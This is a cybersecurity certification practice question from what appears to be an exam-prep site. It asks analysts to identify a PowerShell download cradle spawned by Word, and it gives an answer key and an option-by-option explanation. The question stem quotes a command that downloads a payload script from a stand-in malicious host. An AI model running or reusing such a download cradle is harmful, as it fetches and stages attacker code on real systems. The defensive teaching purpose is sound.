Courseiva
Security Operations →hardMultiple Choice

CS0-003 Security Operations Practice Question

An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?

Answer choices

Why each option matters

Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.

Correct answer & explanation

✓

PowerShell download cradle

The attack chain involves a Microsoft Office document (winword.exe) launching PowerShell to download a payload. This is a classic LOLBin technique using PowerShell for code execution and download cradles.

Answer analysis

Option-by-option breakdown

For each option: why learners choose it and why it is or isn't the right answer here.

  • ✓

    PowerShell download cradle

    Why this is correct

    The EDR alert describes a PowerShell download cradle, a classic Living off the Land (LotL) technique where command-line utilities like Invoke-WebRequest or Net.WebClient are abused to fetch and execute malicious code. Security analysts frequently flag these patterns because they bypass traditional file-based detection mechanisms by leveraging trusted system binaries to download payloads directly into memory or disk.

  • ✗

    WMI persistence

    Why it's wrong here

    Windows Management Instrumentation (WMI) persistence relies on creating event filters, consumers, and bindings to execute payloads in response to specific system triggers. While PowerShell can be used to configure these WMI objects, the specific alert details a download cradle mechanism rather than the establishment of a persistent administrative trigger.

  • ✗

    Scheduled task creation

    Why it's wrong here

    Scheduled task creation involves registering a task with the Task Scheduler service, using tools like schtasks.exe or the Register-ScheduledTask cmdlet, to achieve execution at specific intervals or events. The alert in question focuses strictly on the retrieval of an external payload via a download cradle, not the configuration of a persistent execution schedule.

  • ✗

    DLL side-loading

    Why it's wrong here

    DLL side-loading is an execution technique where an adversary places a malicious DLL in the same directory as a legitimate, trusted executable that is vulnerable to DLL search order hijacking. The EDR alert describes a network-based download cradle utilizing PowerShell, which does not involve manipulating the Windows dynamic-link library search order or hijacking legitimate binary execution paths.

About these practice questions

Courseiva writes every CS0-004 question from scratch — 701 in total, each with an explanation and a wrong-answer breakdown. None are copied from real exams or dumps. Learn why practice questions differ from exam dumps →

How Courseiva writes practice questions · Editorial policy

JA

Written by Johnson Ajibi, MSc IT Security

Senior Network & Security Engineer · founder of Courseiva

This CS0-004 practice question is part of Courseiva's free CompTIA certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the CS0-004 exam.